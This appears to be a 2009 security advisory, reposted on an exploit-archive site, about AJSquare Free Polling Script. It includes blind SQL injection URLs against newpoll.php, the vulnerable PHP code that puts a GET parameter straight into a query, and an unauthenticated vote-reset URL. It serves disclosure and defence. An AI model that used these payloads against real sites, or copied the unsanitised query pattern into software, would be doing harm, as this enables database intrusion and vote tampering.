AJSquare Free Polling Script (DB) Multiple Vulnerabilities

2009-08-25 / 2009-08-26
Credit: G4N0K
Risk: High
Local: No
Remote: Yes

AJSquare Free Polling Script (DB) Multiple Vulnerabilities [&#187;] Script: [ AJSquare Free Polling Script DataBase Version ] [&#187;] Language: [ PHP ] [&#187;] Website: [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ] [&#187;] Type: [ Free ] [&#187;] Report-Date: [ 10.11.2008 ] [&#187;] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ XPL ]=== [1][!] Blind SQLi (MQ = off) [&#187;] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/* True [&#187;] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/* False [../admin/include/newpoll.php] <?php require 'connect.php'; $ques = $_GET[ques]; $total = $_GET[total]; for($i=1;$i<=$total;$i++) { $val[] = array($_GET["val".$i]); } $sqlnew = "select * from newpoll where question='$ques'"; $resnew = mysql_query($sqlnew); [../admin/include/newpoll.php] [2][!] Reset Votes - Just call resetvote.php ;) [&#187;] http://127.0.0.1/[path]/admin/resetvote.php ===[ Greetz ]=== [&#187;] ALLAH [&#187;] Tornado2800 <Tornado2800[at]gmail.com> [&#187;] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... exit();

References:

http://www.milw0rm.com/exploits/7086
http://secunia.com/advisories/32600
http://osvdb.org/49779


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top